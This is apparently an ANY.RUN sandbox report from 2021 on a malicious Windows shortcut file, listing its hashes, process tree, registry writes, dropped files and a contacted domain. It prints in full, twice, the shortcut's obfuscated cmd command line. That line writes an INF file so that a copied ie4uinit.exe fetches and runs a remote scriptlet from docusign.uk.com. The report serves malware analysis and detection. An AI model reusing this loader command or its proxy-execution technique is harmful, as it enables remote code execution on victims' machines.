File name: | 45593a7071903724aae4974d478a17784cfca63af4d3404312fb4b5ecb9e0f1c |
Full analysis: | https://app.any.run/tasks/58f92791-2735-4bb1-8c2e-74894b313bac |
Verdict: | Malicious activity |
Analysis date: | October 07, 2021, 10:29:29 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/octet-stream |
File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Icon number=97, Archive, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=278528, window=hide |
MD5: | D5DF5B266FC8C9AF26F6593F8EA771A8 |
SHA1: | B786A7C78B746CDA42F49211FC2E437AF17D1CE4 |
SHA256: | 45593A7071903724AAE4974D478A17784CFCA63AF4D3404312FB4B5ECB9E0F1C |
SSDEEP: | 96:8yGcgoiDlGKUTk3KJzQcQlmtnwC1FVu/FtXN8i3wXtVaTRdSLqDyXtsHJr6uTist:8yGEoKTVe |
.lnk | | | Windows Shortcut (100) |
---|
MachineID: | - |
---|---|
IconFileName: | imageres.dll |
CommandLineArguments: | /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!" |
RelativePath: | ..\..\..\..\ |
LocalBasePath: | - |
VolumeLabel: | Windows |
DriveType: | Fixed Disk |
TargetFileDOSName: | - |
HotKey: | (none) |
RunWindow: | Normal |
IconIndex: | 97 |
TargetFileSize: | 278528 |
FileAttributes: | Archive |
Flags: | IDList, LinkInfo, RelativePath, CommandArgs, IconFile, Unicode, ExpString |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3388 | "C:\Windows\System32\cmd.exe" /v /c set "GTAZMGS4299=set" && call set "GTAZMGS0851=%GTAZMGS4299:~0,1%" && (for %j in (c) do @set "GTAZMGS1665=%~j") && !GTAZMGS0851!et "GTAZMGS89944=ure=$w" && !GTAZMGS0851!et "GTAZMGS55863=a" && set "GTAZMGS39107=t" && !GTAZMGS0851!et "GTAZMGS5644=d" && set "GTAZMGS68144=." && set "GTAZMGS5707=init" && set "GTAZMGS84148=e" && set "GTAZMGS28159=settings" && set "GTAZMGS1300=!GTAZMGS68144!inf" && !GTAZMGS0851!et "GTAZMGS5629=ieu!GTAZMGS5707!!GTAZMGS1300!" && call !GTAZMGS0851!et "GTAZMGS11336=%app!GTAZMGS5644!ata%\Micro!GTAZMGS0851!oft\" && !GTAZMGS0851!et "GTAZMGS53594=!GTAZMGS11336!!GTAZMGS5629!" && !GTAZMGS0851!et "GTAZMGS2081="^" && (for %x in ("[version]" "signat!GTAZMGS89944!indow!GTAZMGS0851! ntf7f81a39-5f63-5b42-9efd-1f13b5431005quot; "[!GTAZMGS5644!e!GTAZMGS0851!tinationdirs]" "mPPvq=01" "[!GTAZMGS5644!efaultin!GTAZMGS0851!tall.windows7]" "UnRegis!GTAZMGS39107!erOCXs=wyGHzZ" "!GTAZMGS5644!elfiles=mPPvq" "[wyGHzZ]" "%11%\scRo%GTAZMGS17745%j,NI,%GTAZMGS37749%%GTAZMGS0413%%GTAZMGS0413%p%GTAZMGS25026%%GTAZMGS9855%%GTAZMGS9855%docusign!GTAZMGS68144!uk!GTAZMGS68144!%GTAZMGS29707%/history!GTAZMGS68144!txt" "[mPPvq]" "ieu%GTAZMGS2306%!GTAZMGS1300!" "[!GTAZMGS0851!!GTAZMGS39107!rings]" "GTAZMGS2306=!GTAZMGS5707!" "GTAZMGS0413=t" "!GTAZMGS0851!ervicen!GTAZMGS55863!me=' '" "GTAZMGS37749=h" "GTAZMGS25026=:" "GTAZMGS9855=/" "!GTAZMGS0851!hortsvcn!GTAZMGS55863!me=' '" "GTAZMGS29707=com" "GTAZMGS17745=b") do @e!GTAZMGS1665!ho %~x)>"!GTAZMGS53594!" && !GTAZMGS0851!et "GTAZMGS06018=ie4u!GTAZMGS5707!.!GTAZMGS84148!xe" && call copy /Y %win!GTAZMGS5644!ir%\!GTAZMGS0851!ystem32\!GTAZMGS06018! "!GTAZMGS11336!" && !GTAZMGS0851!t!GTAZMGS55863!rt "" /MIN wmi!GTAZMGS1665! proce!GTAZMGS0851!s call !GTAZMGS1665!rea!GTAZMGS39107!e "!GTAZMGS11336!!GTAZMGS06018! -base!GTAZMGS28159!" | C:\Windows\System32\cmd.exe | Explorer.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1876 | wmic process call create "C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings" | C:\Windows\System32\Wbem\WMIC.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: WMI Commandline Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
856 | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -basesettings | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe | — | wmiprvse.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: IE Per-User Initialization Utility Exit code: 0 Version: 11.00.9600.19597 (winblue_ltsb_escrow.191216-1311) | ||||
3732 | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe -ClearIconCache | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe | — | ie4uinit.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: IE Per-User Initialization Utility Exit code: 0 Version: 11.00.9600.19597 (winblue_ltsb_escrow.191216-1311) |
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3 |
Operation: | write | Name: | IEPropFontName |
Value: Times New Roman | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\3 |
Operation: | write | Name: | IEFixedFontName |
Value: Courier New | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4 |
Operation: | write | Name: | IEPropFontName |
Value: Times New Roman | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\4 |
Operation: | write | Name: | IEFixedFontName |
Value: Courier New | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5 |
Operation: | write | Name: | IEPropFontName |
Value: Times New Roman | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\5 |
Operation: | write | Name: | IEFixedFontName |
Value: Courier New | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6 |
Operation: | write | Name: | IEPropFontName |
Value: Times New Roman | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\6 |
Operation: | write | Name: | IEFixedFontName |
Value: Courier New | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7 |
Operation: | write | Name: | IEPropFontName |
Value: Sylfaen | |||
(PID) Process: | (856) ie4uinit.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\International\Scripts\7 |
Operation: | write | Name: | IEFixedFontName |
Value: Sylfaen |
PID | Process | Filename | Type | |
---|---|---|---|---|
3388 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\ieuinit.inf | ini | |
MD5:6DB1797BCD95AAF5F11FCFDD990E55CE | SHA256:E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B | |||
856 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.txt | text | |
MD5:3098BBDD84794F3429FE02E2D7781C48 | SHA256:C25F444580905AE18DDB7C254C44A8E3FDAC5B359E347F2C130B8BF7706CDB81 | |||
856 | ie4uinit.exe | C:\Windows\Temp\OLD4410.tmp | ini | |
MD5:6DB1797BCD95AAF5F11FCFDD990E55CE | SHA256:E42046AF91FC0852A2935925DB6E510A6B4B6C76DB46E8067FE70BD7FA4E717B | |||
856 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\msapplication.xml | xml | |
MD5:E153C6D960F845B74F1A90AE11670556 | SHA256:4B906B6DB2836AAA38ED20EBD2D1F1DAE2394AFAD578EE83720A919C8D366D29 | |||
856 | ie4uinit.exe | C:\Users\admin\Favorites\Links\Web Slice Gallery.url | text | |
MD5:1E7E5E93C2A5AADAF932F93D25C57F3E | SHA256:8B94D04FECE582E4182E8E73F46FB86EB8E965C69C526C42805ABB9E43641E35 | |||
3388 | cmd.exe | C:\Users\admin\AppData\Roaming\Microsoft\ie4uinit.exe | executable | |
MD5:ACA03178C248B32343B03F4B9ACCE1B9 | SHA256:C3612DA14216A2F5872BD0D140A76D1A257E9668EFA46A5CED5419E51ED30B49 | |||
856 | ie4uinit.exe | C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\brndlog.bak | text | |
MD5:E9E473C9777B0C24D50EE8C972A78FE2 | SHA256:90BE32975E76E679B01FF719148DF508CBBE2D7F2C47D93201F33A31994B4174 |
Domain | IP | Reputation |
---|---|---|
docusign.uk.com |
| unknown |